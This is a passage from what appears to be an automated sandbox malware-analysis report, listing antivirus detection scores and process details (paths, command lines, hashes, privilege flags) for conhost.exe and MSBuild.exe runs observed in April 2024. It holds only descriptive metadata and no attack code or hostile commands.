                        Antivirus matches:
                        • Detection: 100%, Joe Sandbox ML
                        • Detection: 24%, ReversingLabs
                        • Detection: 42%, Virustotal, Browse
                        Reputation:low
                        Has exited:true

                        General

                        Target ID:6
                        Start time:23:54:17
                        Start date:04/08/2024
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff6d64d0000
                        File size:862'208 bytes
                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:false

                        General

                        Target ID:7
                        Start time:23:54:17
                        Start date:04/08/2024
                        Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                        Wow64 process (32bit):true
                        Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                        Imagebase:0xca0000
                        File size:262'432 bytes
                        MD5 hash:8FDF47E0FF70C40ED3A17014AEEA4232
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high
                        Has exited:false

                        Disassembly

                        Reset < >